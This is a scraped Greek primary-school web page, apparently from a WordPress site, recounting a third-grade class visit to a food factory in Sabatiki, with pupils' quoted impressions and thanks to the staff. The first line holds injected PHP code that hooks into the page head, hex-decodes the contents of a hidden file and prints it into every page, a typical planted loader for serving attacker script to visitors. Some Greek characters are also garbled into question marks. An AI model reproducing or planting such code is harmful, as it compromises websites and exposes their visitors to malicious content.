if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΔΙΔΑΚΤΙΚΗ ΕΠΙΣΚΕΨΗ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΔΙΔΑΚΤΙΚΗ ΕΠΙΣΚΕΨΗ

Στις 30-11-2011 οι  μαθητές της Γ?  τάξης πραγματοποίησαν διδακτική επίσκεψη στο εργοστάσιο ?Mediterranean Foods? που βρίσκεται στη Σαμπατική.

Σκοπός της επίσκεψης ήταν να γνωρίσουν οι μαθητές τον τρόπο λειτουργίας ενός εργοστασίου, να ενημερωθούν  για τις θετικές συνέπειες από την ύπαρξη του εργοστασίου στην περιοχή και να γνωρίσουν τον τρόπο παρασκευής των συγκεκριμένων ειδών διατροφής.

 

Οι εντυπώσεις μέσα από τα μάτια των ίδιων των μαθητών:

 

«PB300044.JPG Μου έκαναν εντύπωση τα σκουφάκια που φορέσαμε όλοι για να μπούμε στο χώρο παραγωγής, για να μην πέσουν τρίχες ή άλλα αντικείμενα στα προϊόντα.»

«Μου έκανε εντύπωση ο μεγάλος χώρος του εργοστασίου, τα μεγάλα μηχανήματα, οι τεράστιες δεξαμενές ??»

«Εντυπωσιάστηκα γιατί όλα δούλευαν αυτόματα: τα βαζάκια περνούσαν στη σειρά και γέμιζαν μουστάρδα ή μαγιονέζα, οι ετικέτες κολλούσαν αυτόματα στα βαζάκια ?.»

«Μου άρεσε το μεγάλο ψυγείο που διατηρούν τα προϊόντα και το μηχάνημα που έδενε τα κουτιά.»

«Σε κάθε παραγωγή ένα δείγμα προϊόντος ελέγχεται PB300032.JPG στο χημείο!»

«Ακόμη με ακτίνες ελέγχονται οι συσκευασίες των προϊόντων μήπως υπάρχει μέσα κάποιο κομμάτι μέταλλο!»

 

Οι μαθητές και οι δασκάλες της  Γ΄  τάξης του Δημοτικού Σχολείου Λεωνιδίου ευχαριστούν θερμά τη διεύθυνση και το προσωπικό του εργοστασίου για την άψογη υποδοχή, ενημέρωση και ξενάγηση στο χώρο.